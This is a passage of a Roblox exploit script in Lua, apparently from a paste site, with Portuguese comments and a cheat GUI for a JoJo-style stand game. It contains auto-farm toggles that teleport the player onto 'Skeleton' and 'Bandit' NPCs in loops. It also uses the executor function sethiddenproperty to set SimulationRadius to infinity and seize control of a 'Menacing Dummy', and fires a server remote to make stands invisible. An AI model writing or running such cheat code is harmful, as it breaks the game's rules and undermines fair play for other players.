  909. SkeletonNpc = npc
  910. break -- Seleciona o primeiro e para a busca
  911. end
  912. end
  913.  
  914. -- Se houver um Skeleton disponível
  915. if SkeletonNpc then
  916. -- Teleporta para o Skeleton e realiza as ações
  917. while AutoSkeletonFarmActive and SkeletonNpc and SkeletonNpc.Parent do
  918. -- Teleporta para o Skeleton
  919. Player.Character.HumanoidRootPart.CFrame = SkeletonNpc.HumanoidRootPart.CFrame
  920. task.wait(0.5) -- Pausa durante a ação
  921. end
  922. end
  923. end
  924. end
  925.  
  926. -- Caso o jogador morra, retenta o farm
  927. Player.CharacterAdded:Connect(function()
  928. while not Player.Character:FindFirstChild("HumanoidRootPart") do
  929. task.wait(0.1)
  930. end
  931. FarmSkeletonNpc()
  932. end)
  933.  
  934. -- Começa o farm
  935. FarmSkeletonNpc()
  936. end
  937. end)
  938.  
  939. local AutoBanditFarmActive = false
  940. SectionBoss3:NewToggle("Auto Kill Bandit (Sonic)", "Sonic Needed", function(Value)
  941. AutoBanditFarmActive = Value
  942.  
  943. if AutoBanditFarmActive then
  944. -- Função para farmar Bandit NPCs
  945. local function FarmBanditNpc()
  946. while AutoBanditFarmActive do
  947. task.wait(0.5) -- Pausa para evitar loop infinito
  948.  
  949. -- Busca o primeiro Bandit disponível
  950. local BanditNpc = nil
  951. for _, npc in pairs(workspace:GetChildren()) do
  952. if npc.Name == "Bandit" and npc:FindFirstChild("HumanoidRootPart") then
  953. BanditNpc = npc
  954. break -- Seleciona o primeiro e para a busca
  955. end
  956. end
  957.  
  958. -- Se houver um Bandit disponível
  959. if BanditNpc then
  960. -- Teleporta para o Bandit e realiza as ações
  961. while AutoBanditFarmActive and BanditNpc and BanditNpc.Parent do
  962. -- Teleporta para o Bandit
  963. Player.Character.HumanoidRootPart.CFrame = BanditNpc.HumanoidRootPart.CFrame
  964. task.wait(0.5) -- Pausa durante a ação
  965. end
  966. end
  967. end
  968. end
  969.  
  970. -- Caso o jogador morra, retenta o farm
  971. Player.CharacterAdded:Connect(function()
  972. while not Player.Character:FindFirstChild("HumanoidRootPart") do
  973. task.wait(0.1)
  974. end
  975. FarmBanditNpc()
  976. end)
  977.  
  978. -- Começa o farm
  979. FarmBanditNpc()
  980. end
  981. end)
  982.  
  983. local FunnyTab = Window:NewTab("For Fun")
  984.  
  985. local SectionFunny = FunnyTab:NewSection("Funny stuffs")
  986.  
  987. SectionFunny:NewButton("Visual Clown Crimson", "Any Stand", function()
  988. local Stands = {}
  989.  
  990. local ReplicatedStorage = game:GetService("ReplicatedStorage")
  991. local RunService = game:GetService("RunService")
  992. local Players = game:GetService("Players")
  993.  
  994. local Player = Players.LocalPlayer
  995. local RenderStepped = RunService.RenderStepped
  996. local StandsFolder = ReplicatedStorage.Viewports.Stands
  997.  
  998. local function GetStands()
  999. for i,v in next, StandsFolder:GetChildren() do
  1000. local Name = v.Name
  1001. if v:FindFirstChild("StorageNPC") and v.StorageNPC:FindFirstChild("Stand") then
  1002. Stands[Name] = v.StorageNPC.Stand
  1003. end
  1004. end
  1005. end
  1006.  
  1007. local function LoadAnimator(RootPart)
  1008. local Animation = RootPart:FindFirstChild("Animator") or RootPart:FindFirstChild("Nothing")
  1009. Player.Character:WaitForChild("Humanoid"):LoadAnimation(Animation)
  1010. end
  1011.  
  1012. local function VisualStand(StandName)
  1013. local Stand = Stands[StandName]
  1014.  
  1015. if not Player.Character then return end
  1016. if not Stand then return end
  1017. Stand = Stand:Clone()
  1018.  
  1019. local StandRootPart = Stand.StandHumanoidRootPart
  1020. local Character = Player.Character
  1021.  
  1022. if Character:FindFirstChild("Stand") then
  1023. Character.Stand:Destroy()
  1024. end
  1025.  
  1026. Character:WaitForChild("HumanoidRootPart"):WaitForChild("Stand2Human").Part1 = StandRootPart
  1027.  
  1028. Stand.Parent = Player.Character
  1029. LoadAnimator(StandRootPart)
  1030. end
  1031.  
  1032. GetStands() -- carrega o nome dos stands
  1033.  
  1034. VisualStand("clowncrimson") -- nome do stand
  1035. end)
  1036.  
  1037. SectionFunny:NewButton("Visual BPG", "Any Stand", function()
  1038. local Stands = {}
  1039.  
  1040. local ReplicatedStorage = game:GetService("ReplicatedStorage")
  1041. local RunService = game:GetService("RunService")
  1042. local Players = game:GetService("Players")
  1043.  
  1044. local Player = Players.LocalPlayer
  1045. local RenderStepped = RunService.RenderStepped
  1046. local StandsFolder = ReplicatedStorage.Viewports.Stands
  1047.  
  1048. local function GetStands()
  1049. for i,v in next, StandsFolder:GetChildren() do
  1050. local Name = v.Name
  1051. if v:FindFirstChild("StorageNPC") and v.StorageNPC:FindFirstChild("Stand") then
  1052. Stands[Name] = v.StorageNPC.Stand
  1053. end
  1054. end
  1055. end
  1056.  
  1057. local function LoadAnimator(RootPart)
  1058. local Animation = RootPart:FindFirstChild("Animator") or RootPart:FindFirstChild("Nothing")
  1059. Player.Character:WaitForChild("Humanoid"):LoadAnimation(Animation)
  1060. end
  1061.  
  1062. local function VisualStand(StandName)
  1063. local Stand = Stands[StandName]
  1064.  
  1065. if not Player.Character then return end
  1066. if not Stand then return end
  1067. Stand = Stand:Clone()
  1068.  
  1069. local StandRootPart = Stand.StandHumanoidRootPart
  1070. local Character = Player.Character
  1071.  
  1072. if Character:FindFirstChild("Stand") then
  1073. Character.Stand:Destroy()
  1074. end
  1075.  
  1076. Character:WaitForChild("HumanoidRootPart"):WaitForChild("Stand2Human").Part1 = StandRootPart
  1077.  
  1078. Stand.Parent = Player.Character
  1079. LoadAnimator(StandRootPart)
  1080. end
  1081.  
  1082. GetStands() -- carrega o nome dos stands
  1083.  
  1084. VisualStand("BPG") -- nome do stand
  1085. end)
  1086.  
  1087. SectionFunny:NewButton("Become a Dummy (you need to touch it)", "Dummy Moment", function()
  1088. local ReplicatedStorage = game:GetService("ReplicatedStorage")
  1089. local RunService = game:GetService("RunService")
  1090. local Players = game:GetService("Players")
  1091. local Player = Players.LocalPlayer
  1092.  
  1093. local Camera = workspace.CurrentCamera
  1094. local Character = Player.Character or Player.CharacterAdded:Wait()
  1095. local RootPart1 = Character:WaitForChild("HumanoidRootPart")
  1096.  
  1097. local _Position = CFrame.new(0, -17, 0) * CFrame.Angles(math.rad(-90), 0, 0)
  1098.  
  1099. local function Control(NewCharacter)
  1100. local function SetSimulationRadius()
  1101. pcall(sethiddenproperty, Player, "SimulationRadius", math.huge)
  1102. end
  1103.  
  1104. -- Executa SetSimulationRadius continuamente para manter controle do Dummy
  1105. RunService.Heartbeat:Connect(SetSimulationRadius)
  1106.  
  1107. local Void = workspace.FallenPartsDestroyHeight
  1108. Character.Archivable = true
  1109.  
  1110. for _, Part in ipairs(Character:GetDescendants()) do
  1111. if Part:IsA("BasePart") then
  1112. Part.CanCollide = false
  1113. end
  1114. end
  1115.  
  1116. Player.Character = NewCharacter
  1117. Camera.CameraSubject = NewCharacter
  1118.  
  1119. local RootPart2 = NewCharacter:WaitForChild("HumanoidRootPart")
  1120.  
  1121. local function Respawn()
  1122. Camera.CameraSubject = Character
  1123. Player.Character = Character
  1124. task.wait(0.1)
  1125. Character:WaitForChild("Humanoid").Health = 0
  1126. NewCharacter.Parent = nil
  1127. end
  1128.  
  1129. local SteppedConnection
  1130. SteppedConnection = RunService.Stepped:Connect(function()
  1131. if not RootPart1 then
  1132. return SteppedConnection:Disconnect()
  1133. end
  1134.  
  1135. local IsInteger = tostring(Void):find("-") or false
  1136. local Position = RootPart1.Position
  1137.  
  1138. if IsInteger and (Position.Y <= Void) or not IsInteger and (Position.Y >= Void) then
  1139. SteppedConnection:Disconnect()
  1140. Respawn()
  1141. end
  1142. end)
  1143.  
  1144. local RenderSteppedConnection
  1145. RenderSteppedConnection = RunService.RenderStepped:Connect(function()
  1146. if not RootPart1 or not RootPart2 then
  1147. return RenderSteppedConnection:Disconnect()
  1148. end
  1149.  
  1150. RootPart1.CFrame = RootPart2.CFrame * _Position
  1151. end)
  1152.  
  1153. NewCharacter:WaitForChild("Humanoid").Died:Once(Respawn)
  1154. end
  1155.  
  1156. local TouchedConnection
  1157. TouchedConnection = RootPart1.Touched:Connect(function(Part)
  1158. local Target = Part.Parent
  1159. if Target:IsA("Model") and Target.Name == "Menacing Dummy" and Target:FindFirstChild("Humanoid") then
  1160. TouchedConnection:Disconnect() -- Desconecta o evento Touched para evitar repetição
  1161. Control(Target)
  1162. end
  1163. end)
  1164. end)
  1165.  
  1166. SectionFunny:NewButton("Invisible Stand", "Any Stand", function()
  1167. local Players = game:GetService("Players")
  1168. local ReplicatedStorage = game:GetService("ReplicatedStorage")
  1169. local player = Players.LocalPlayer
  1170.  
  1171. local characterModel = game.Workspace:FindFirstChild(player.Name)
  1172.  
  1173. if characterModel then
  1174. local standModel = characterModel:FindFirstChild("Stand")
  1175.  
  1176. if standModel then
  1177. for _, part in pairs(standModel:GetDescendants()) do
  1178. if part:IsA("BasePart") then
  1179. local args = { part, 1 }
  1180. ReplicatedStorage.Main.Transparency:FireServer(unpack(args))
  1181. end
  1182. end
  1183. end
  1184. end
  1185. end)
Advertisement
Add Comment
Please, Sign In to add comment